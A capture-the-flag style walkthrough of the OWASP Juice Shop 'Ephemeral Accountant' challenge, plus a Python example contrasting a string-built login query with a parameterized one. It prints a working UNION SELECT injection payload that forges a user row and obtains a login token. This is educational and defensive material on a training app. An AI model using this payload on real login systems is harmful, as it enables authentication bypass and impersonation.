Hacking OWASP’s Juice Shop Pt. 51: Ephemeral Accountant

Challenge: 

Name: Ephemeral Accountant

Description: Log in with the (non-existing) accountant acc0unt4nt@juice-sh.op without ever registering that user.

Difficulty: 4 star

Category: Injection

Expanded Description: https://pwning.owasp-juice.shop/part2/injection.html

Tools used:

Burp Suite, FoxyProxy

Resources used:

Solution Guide

Methodology: 

For the first time in this project, I found a challenge where the expanded description provided me with no ideas about a path forward. With a prohibition on adding the "acc0unt4nt@juice-sh.op" account to the user database table, I was completely stumped. I tried the few injection tricks I knew to no avail. At that point, I allowed myself to read the first bullet point in the challenge solution, which was "Go to http://localhost:3000/#/login and try logging in with Email ' and any Password while observing the Browser DevTools network tab".

[Screenshot: the Juice Shop login page, showing the Email and Password fields, "Forgot your password?", the "Log in" button, "Remember me", "Log in with Google" and "Not yet a customer?"]

While I could have used the browser tools, I opted instead to use Burp Suite and FoxyProxy.

[Screenshot: the Burp Suite response to the login attempt with Email ' (Content-Type: application/json; charset=utf-8, Content-Length: 1285, Date: Wed, 18 Nov 2020 19:27:21 GMT). The JSON error body leaks a SequelizeDatabaseError with errno 1, code SQLITE_ERROR and a stack trace starting at Query.formatError, with the message

SQLITE_ERROR: unrecognized token: "7215ee9c7d9dc229d2921a40e899ec5f' AND deletedAt IS NULL"

and the full query that produced it:

SELECT * FROM Users WHERE email = ''' AND password = '7215ee9c7d9dc229d2921a40e899ec5f' AND deletedAt IS NULL]

An MD5-hashed space character wasn't going to provide me with a means of ingress, so remembering that I'm here to learn new things, I grudgingly read the rest of the solution. In that solution, it was revealed that a nested UNION SELECT attack would be required to complete the challenge. Essentially the attack required the creation of an entirely new database table entry, but in a temporary capacity, using "UNION SELECT * FROM (<entire fabricated User table entry>)--" as the syntax. So, if I'm correct, the UNION SELECT attack I crafted would create a temporary (some might say ephemeral) table entry without ever interacting with the User table, allowing me to log in as whoever I wanted to be.
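To make the mechanism concrete from the defender's side, here is an added example (not the walkthrough's or Juice Shop's own code) that reproduces the login query shape visible in the leaked error against an in-memory SQLite table, beside the parameterized form of the same query. The schema, the sample admin user and the row-fabricating payload are constructed for this example and reduced to the columns visible in the screenshots; the real Juice Shop Users table has more columns than this (assumption). The `handle_login` wrapper shows the other fix the leaked stack trace calls for: never echo the driver's error text to the client.

```python
"""Vulnerable vs. parameterized login query, constructed example."""
import hashlib
import sqlite3

# Constructed schema: the columns visible in the walkthrough's screenshots
# plus deletedAt, which the leaked query references. Not the real model.
SCHEMA = """
CREATE TABLE Users (
  id INTEGER PRIMARY KEY,
  username TEXT,
  email TEXT UNIQUE,
  password TEXT,
  role TEXT,
  deluxeToken TEXT,
  lastLoginIp TEXT,
  deletedAt TEXT
)
"""

# The email-field payload from the walkthrough, reduced to the eight columns
# of the constructed schema: a UNION over an inline SELECT that fabricates a
# row which never touches the Users table.
EPHEMERAL_PAYLOAD = (
    "' UNION SELECT * FROM (SELECT 20 AS id, '' AS username, "
    "'acc0unt4nt@juice-sh.op' AS email, 'test1234' AS password, "
    "'accounting' AS role, '123' AS deluxeToken, '1.2.3.4' AS lastLoginIp, "
    "NULL AS deletedAt)--"
)


def md5_hex(text):
    # Juice Shop stores unsalted MD5 password hashes; md5(' ') is the
    # 7215ee9c... value that appears in the leaked query.
    return hashlib.md5(text.encode()).hexdigest()


def make_db():
    """In-memory database with one constructed, legitimately registered user."""
    conn = sqlite3.connect(":memory:")
    conn.row_factory = sqlite3.Row
    conn.execute(SCHEMA)
    conn.execute(
        "INSERT INTO Users VALUES (1, 'admin', 'admin@juice-sh.op', ?, 'admin', '', '', NULL)",
        (md5_hex("admin123"),),
    )
    conn.commit()
    return conn


def login_vulnerable(conn, email, password):
    # Same shape as the query leaked in the SQLITE_ERROR: user input is
    # spliced straight into the SQL text, so it can change the statement.
    sql = (
        f"SELECT * FROM Users WHERE email = '{email}' "
        f"AND password = '{md5_hex(password)}' AND deletedAt IS NULL"
    )
    row = conn.execute(sql).fetchone()
    return dict(row) if row else None


def login_parameterized(conn, email, password):
    # Bind parameters: values travel separately from the SQL text, so quotes,
    # UNION and comment markers in the email are compared as plain characters.
    sql = "SELECT * FROM Users WHERE email = ? AND password = ? AND deletedAt IS NULL"
    row = conn.execute(sql, (email, md5_hex(password))).fetchone()
    return dict(row) if row else None


def handle_login(conn, email, password, login_fn):
    """Response wrapper that never echoes driver errors to the client."""
    try:
        user = login_fn(conn, email, password)
    except sqlite3.Error:
        # Log the exception server-side; the client only learns that it failed.
        return {"status": 500, "error": "login failed"}
    if user is None:
        return {"status": 401, "error": "invalid credentials"}
    return {"status": 200, "email": user["email"], "role": user["role"]}


if __name__ == "__main__":
    db = make_db()
    print("vulnerable  :", handle_login(db, EPHEMERAL_PAYLOAD, "x", login_vulnerable))
    print("parameterized:", handle_login(db, EPHEMERAL_PAYLOAD, "x", login_parameterized))
    print("probe, vuln :", handle_login(db, "'", " ", login_vulnerable))
```

Running it shows the string-built query returning a user with id 20 and role "accounting" even though no such row exists in Users, while the parameterized query treats the whole payload as an email address and returns nothing. A defense-in-depth check that would also have caught the ephemeral row is to issue the JWT only after re-reading the user by primary key with a parameterized query.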

[Screenshot: the Burp Suite request body. The email field carries the payload

' UNION SELECT * FROM (SELECT 20 AS 'id', '' AS 'username', 'acc0unt4nt@juice-sh.op' AS 'email', 'test1234' AS 'password', 'accounting' AS 'role', '123' AS 'deluxeToken', '1.2.3.4' AS 'lastLoginIp', ...

with the remaining columns cut off at the edge of the screenshot.]
[Screenshot: the Burp Suite request and response. The request is POST /rest/user/login HTTP/1.1 to Host: localhost:3000 (Origin and Referer http://localhost:3000/, Content-Type: application/json, Content-Length: 446), with the email field beginning ' UNION SELECT * FROM (SELECT 20 AS ... and an arbitrary password. The response is 200 OK with a JSON "authentication" object containing a token (a JWT beginning eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9...), "bid": 6 and "umail": "acc0unt4nt@juice-sh.op".]

You successfully solved a challenge: Ephemeral Accountant (Log in with the (non-existing) accountant acc0unt4nt@juice-sh.op without ever registering that user.)

Prevention and Mitigation Strategies:

OWASP Mitigation Cheat Sheet

Lessons Learned and Things Worth Mentioning:

I'm glad that my first post in this project included the disclaimer that I was going to wind up using the Solution Guide. My inexperience and desire to learn all of this stuff is admittedly tied to my ego, and I don't like having to admit defeat. It is imperative, however, that I do just that. Failing to suppress that desire would impose significant limitations on my ability to both learn this material and complete this series of walkthroughs. I think this post will be the last time I'll mention that I'm trying to learn new concepts as opposed to demonstrating mastery. As I clear up the last few four star challenges over the next week and move into the five star category, any further mentioning of my desire to complete challenges without assistance will be detrimental to the quality of the posts, as nearly all of them will require reference to the Solution Guide.

In order to maintain consistency, I’ll still list the Solution Guide in the list of resources used, lest my walkthroughs be mistaken for entirely organic content.
